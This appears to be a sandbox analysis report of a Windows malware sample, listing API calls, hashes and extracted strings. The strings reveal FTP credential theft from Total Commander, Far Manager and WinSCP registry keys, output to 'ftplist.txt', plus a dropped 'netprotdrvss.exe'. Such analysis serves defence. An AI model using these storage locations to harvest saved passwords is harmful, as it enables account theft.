                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  • Opcode ID: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                  • Opcode Fuzzy Hash: bce84979032c395480666c2d60b9174811821601ee86a2001902def64962fbd3
                  • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                  APIs
                  • GetSystemTime.KERNEL32(?,00000000,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,00000000,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID:
                  • API String ID: 3735792614-0
                  • Opcode ID: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                  • Opcode Fuzzy Hash: 0c4dc03f5a347e2c27f051dc2031945d9a04d2897cd941f14c1bc42406c11d92
                  • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00406CCF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  • Opcode ID: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                  • Instruction ID: 5612040357c07126fa19026aaffe8c4f09115318cb9d2fe7a616e1c4ae3a2977
                  • Opcode Fuzzy Hash: 55562b46774a615dc2e97dfe1c8d2773bede11335cf8e3c3be8baa064d73f36a
                  • Instruction Fuzzy Hash: C9E04FB2D4011D5BDB1C9B60EE47BD9BBF8EB11304F0140E6D746E5180E6B8DB848F95
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                  • Instruction ID: 218ff2483168da8b183dc8d255f139c90e55d0551e3cd34b08f9c15d5f680e8f
                  • Opcode Fuzzy Hash: 6a180277a47174503745c50212eccdbe59cf0734582742268f170c434fce9886
                  • Instruction Fuzzy Hash: FB423CB6E413099FDB08CFD6D8C09DCB7B3FFD8314B1A91A9C505A7316D6B87A068A50
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650
                  • Opcode ID: f00215b0a2c050b351c75e946f92b6e3bcf83530ecbb64207e8b54d6640c664f
                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                  • Opcode Fuzzy Hash: f00215b0a2c050b351c75e946f92b6e3bcf83530ecbb64207e8b54d6640c664f
                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                  APIs
                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00020002), ref: 00403A09
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                    • Part of subcall function 004039EA: RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 00403A55
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Heap$AllocateEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                  • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                  • API String ID: 1603279786-3914982127
                  • Opcode ID: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                  • Opcode Fuzzy Hash: 26c8f4bebab1ae11d82167087f32e99de9e525031e1043edf7ba74d8e218de96
                  • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                  APIs
                  • OleInitialize.OLE32(00000000), ref: 004027F5
                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Internet$InitializeOpenOption
                  • String ID: From: true
                  • API String ID: 1176259655-9585188
                  • Opcode ID: e3ed93f08a692b048133c282a57554ffb430715b37394e79d1082c6afb7cb1c7
                  • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                  • Opcode Fuzzy Hash: e3ed93f08a692b048133c282a57554ffb430715b37394e79d1082c6afb7cb1c7
                  • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                  APIs
                    • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                  • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                  • GetLastError.KERNEL32(?), ref: 00402F4E
                  • GetLastError.KERNEL32 ref: 00403237
                  • GetLastError.KERNEL32(?), ref: 00403258
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                  • String ID: .html$From: $Via: $^client=$^key=$file$none
                  • API String ID: 2247176544-3749385445
                  • Opcode ID: 6a9d8a2b960fb8ecbd71def97b915302dd31e261924da3fa70170851c5f8d9bc
                  • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                  • Opcode Fuzzy Hash: 6a9d8a2b960fb8ecbd71def97b915302dd31e261924da3fa70170851c5f8d9bc
                  • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C0C), ref: 004041FD
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                  • RegCloseKey.ADVAPI32(?), ref: 0040442A
                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,00403736,?), ref: 0040BE4D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: HeapOpen$AllocateCloseEnumFree
                  • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                  • API String ID: 755471147-4007225339
                  • Opcode ID: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                  • Opcode Fuzzy Hash: f29ce97687ee8e0874f7ebd76575de33d86bd70d41b4c66ff4b04de971eb53c9
                  • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,00000C20,?), ref: 00404542
                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                  • RegCloseKey.ADVAPI32(?), ref: 0040476D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: AllocateCloseEnumHeapOpen
                  • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                  • API String ID: 3847610418-285550827
                  • Opcode ID: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                  • Opcode Fuzzy Hash: 1d9827a894f3f8a5ead85e530c3a22f3f32bf575e3091ef13a728acf1b8ae2ad
                  • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript$+@
                  • API String ID: 1987340527-3375436608
                  • Opcode ID: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                  • Opcode Fuzzy Hash: 5d27cd9a03f957513de167056b4cf6ac27d5de90ad2759fc38c181f1cdf52fe6
                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                  APIs
                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000), ref: 0040823C
                  • RtlAllocateHeap.NTDLL(00000008,00000626), ref: 00404888
                  • StrStrIA.SHLWAPI(?,?), ref: 00404913
                  • StrStrIA.SHLWAPI(?,?), ref: 00404925
                  • StrStrIA.SHLWAPI(?,?), ref: 00404935
                  • StrStrIA.SHLWAPI(?,?), ref: 00404947
                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?), ref: 00408280
                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Find$FilePath$AllocateCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                  • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                  • API String ID: 2372625535-1322549247
                  • Opcode ID: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                  • Opcode Fuzzy Hash: 40d46e4d36d3a186cbd1342ff77bf9c5cf66d7f17174447c238647f62506998a
                  • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-2333287219
                  • Opcode ID: 3cd90bfa2c2e623c21955266312847ad0ab3481047343eeed66e671b36a79e18
                  • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                  • Opcode Fuzzy Hash: 3cd90bfa2c2e623c21955266312847ad0ab3481047343eeed66e671b36a79e18
                  • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                  APIs
                  • InternetOpenUrlW.WININET(?,?,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409CF4
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409CF7
                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409D80
                  • RtlAllocateHeap.NTDLL(00000000,?,00406FE2), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,00000000,?,?,00000000,00000000), ref: 00409DE6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Heap$Process$AllocateInternet$FileFreeOpenRead
                  • String ID:
                  • API String ID: 1606433043-0
                  • Opcode ID: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                  • Opcode Fuzzy Hash: ee70a092113cb82a66864aea72d7e922ec5dd955c6bc6ddcba87379bbd99d211
                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54
                  APIs
                  • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: ClearVariant
                  • String ID: _self$http$+@
                  • API String ID: 1473721057-3317424838
                  • Opcode ID: ab4bd90ea66eddbce87e6e8c3e150a25643718a252917f3ed87c424215e5f652
                  • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                  • Opcode Fuzzy Hash: ab4bd90ea66eddbce87e6e8c3e150a25643718a252917f3ed87c424215e5f652
                  • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(?,?,?,?,w,@,00406CB0,Build,w,@), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,?,?,?,004032CE), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  • Opcode ID: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                  • Opcode Fuzzy Hash: 52edaa5a59db4a54e65230104dd567da198e5767e6115127b3a1ab9bfcca5398
                  • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742893910.000000000042B000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742905849.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt
                  • API String ID: 536389180-3563684505
                  • Opcode ID: 61bcf808582cad3b77d14ac24aaddc47d745ec1543ce9a9f2d9a44678f2cfb3e
                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                  • Opcode Fuzzy Hash: 61bcf808582cad3b77d14ac24aaddc47d745ec1543ce9a9f2d9a44678f2cfb3e
                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59
                  APIs
                  • Sleep.KERNEL32(00002710,?,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,?,00000000), ref: 0040A899
                  • Sleep.KERNEL32(00002710,?,?,?,?,?,?,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,Iy@,?,?,?,?,?,?,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1742839395.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1742825866.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1742839395.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
